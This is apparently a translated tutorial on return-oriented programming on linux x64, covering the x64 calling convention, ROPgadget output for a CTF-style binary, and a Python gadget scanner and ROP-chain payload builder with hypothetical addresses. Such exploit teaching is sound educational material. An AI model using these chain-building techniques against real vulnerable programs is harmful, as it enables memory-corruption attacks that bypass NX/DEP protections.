Reference: Zhengmi on ROP: http://www.vuln.cn/6644
0x00 ROP
ROP stands for return-oriented programming. It is an advanced memory-corruption attack technique that chains together short instruction sequences already present in the process (gadgets, each ending in ret) and can be used to bypass the common defenses of modern operating systems, such as non-executable memory (NX/DEP) and code signing.
0x01 Differences between linux_x64 and linux_x86
There are two main differences between linux_x64 and linux_x86. First, addresses widen from 32 to 64 bits; however, a user-space address must stay canonical, that is, no larger than 0x00007FFFFFFFFFFF, so returning to anything above that (for example a return address overwritten with padding bytes) triggers a general protection fault instead of executing. Second, the calling convention changes: on x86 arguments are passed on the stack, whereas on x64 the first six integer arguments are passed in rdi, rsi, rdx, rcx, r8 and r9, and only any further arguments go on the stack. For ROP this means the chain cannot simply lay the arguments out after the called function's address as on x86; it must first load them into the right registers with gadgets such as pop rdi; ret.
0x02 looking for gadgets
Installing ROPgadget on Linux (it is also published on PyPI, so pip install ROPgadget works as an alternative):
git clone https://github.com/JonathanSalwan/ROPgadget.git
cd ROPgadget
sudo python setup.py install
Using ROPgadget (the command name is case-sensitive, and the --only filter is a regular expression matched against the lowercase mnemonics in the output):
~$ ROPgadget --binary level4 --only "pop|ret"
Gadgets information
============================================================
0x00000000004008ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004008ae : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004008b0 : pop r14 ; pop r15 ; ret
0x00000000004008b2 : pop r15 ; ret
0x00000000004008ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004008af : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400700 : pop rbp ; ret
0x00000000004008b3 : pop rdi ; ret
0x00000000004008b1 : pop rsi ; pop r15 ; ret
0x00000000004008ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400601 : ret
0x0000000000400682 : ret 0x2009
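The following script is an added example, not code from the original post and not part of ROPgadget. It shows, on a small scale, what the listing above comes from and how the x64 calling convention from section 0x01 shapes a chain: a tiny gadget scanner starts a decode at every byte offset (which is why one short byte sequence yields the overlapping gadgets at 0x4008ab, 0x4008ac, 0x4008ad, ...), and a chain builder then uses the pop rdi ; ret and pop rsi ; pop r15 ; ret gadgets to load two arguments into registers before returning into a function. The 11 input bytes are a constructed sample (the tail of a typical __libc_csu_init) placed at 0x4008aa so that the addresses match the listing; the target address 0x400690, the argument address 0x601040 and the 136-byte padding are hypothetical values chosen only for illustration.

```python
import struct

# User-space addresses on linux_x64 must be canonical: at most 0x00007FFFFFFFFFFF.
USER_ADDR_MAX = 0x00007FFFFFFFFFFF

# One-byte "pop r64" encodings: opcode 0x58 + register number.
POP_LEGACY = {0x58: "rax", 0x59: "rcx", 0x5A: "rdx", 0x5B: "rbx",
              0x5C: "rsp", 0x5D: "rbp", 0x5E: "rsi", 0x5F: "rdi"}
# The same opcodes after a REX.B prefix (0x41) pop r8..r15.
POP_REX = {0x58: "r8", 0x59: "r9", 0x5A: "r10", 0x5B: "r11",
           0x5C: "r12", 0x5D: "r13", 0x5E: "r14", 0x5F: "r15"}
RET = 0xC3

# Constructed sample: the 11 bytes at the end of a typical __libc_csu_init
# (pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret). Placing them
# at 0x4008aa reproduces the addresses in the ROPgadget output above.
CSU_TAIL = bytes([0x5B, 0x5D, 0x41, 0x5C, 0x41, 0x5D, 0x41, 0x5E, 0x41, 0x5F, 0xC3])
CSU_TAIL_BASE = 0x4008AA


def decode_at(code, off):
    """Decode one pop/ret instruction at offset off.
    Returns (text, length) or None if the byte is not a pop/ret we know."""
    b = code[off]
    if b == RET:
        return "ret", 1
    if b in POP_LEGACY:
        return "pop " + POP_LEGACY[b], 1
    if b == 0x41 and off + 1 < len(code) and code[off + 1] in POP_REX:
        return "pop " + POP_REX[code[off + 1]], 2
    return None


def find_pop_ret_gadgets(code, base, max_insns=10):
    """Start a decode at every byte offset (x86 has no instruction alignment,
    so one byte sequence yields several overlapping gadgets) and keep every
    run of pops that reaches a ret. Returns {address: "pop ... ; ret"}."""
    gadgets = {}
    for start in range(len(code)):
        off, insns = start, []
        while off < len(code) and len(insns) < max_insns:
            d = decode_at(code, off)
            if d is None:
                break
            insns.append(d[0])
            off += d[1]
            if d[0] == "ret":
                gadgets[base + start] = " ; ".join(insns)
                break
    return gadgets


def is_user_canonical(addr):
    """True if addr is a canonical user-space address on linux_x64."""
    return 0 <= addr <= USER_ADDR_MAX


def p64(value):
    """Pack a 64-bit little-endian value (an argument or an address)."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def addr64(addr):
    """Pack an address the chain returns into; refuse non-canonical ones."""
    if not is_user_canonical(addr):
        raise ValueError("non-canonical user-space address: %#x" % addr)
    return p64(addr)


def build_call_chain(gadgets, pad_len, target, arg1, arg2):
    """Build a chain that calls target(arg1, arg2). On x64 the arguments are
    not read from the stack, so each one is popped into its register first."""
    by_text = {text: addr for addr, text in gadgets.items()}
    pop_rdi = by_text["pop rdi ; ret"]
    pop_rsi_r15 = by_text["pop rsi ; pop r15 ; ret"]
    chain = b"A" * pad_len                      # filler up to the saved return address
    chain += addr64(pop_rdi) + p64(arg1)        # rdi = arg1
    chain += addr64(pop_rsi_r15) + p64(arg2)    # rsi = arg2
    chain += p64(0)                             # r15 = dummy (the gadget pops it too)
    chain += addr64(target)                     # "ret" into the target function
    return chain


if __name__ == "__main__":
    found = find_pop_ret_gadgets(CSU_TAIL, CSU_TAIL_BASE)
    for addr in sorted(found):
        print("%#018x : %s" % (addr, found[addr]))
    # Hypothetical target and argument addresses, chosen for illustration only.
    payload = build_call_chain(found, pad_len=136, target=0x400690, arg1=1, arg2=0x601040)
    print(payload.hex())
```

The scanner also reports the pop rbx-led prefix at 0x4008aa and the bare ret at 0x4008b4, since both are valid gadgets in the constructed bytes. Note that the listing above contains no pop rdx gadget, so a function that needs a third argument cannot be called with these gadgets alone; that case is not covered here.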
Basic knowledge of ROP on linux_x64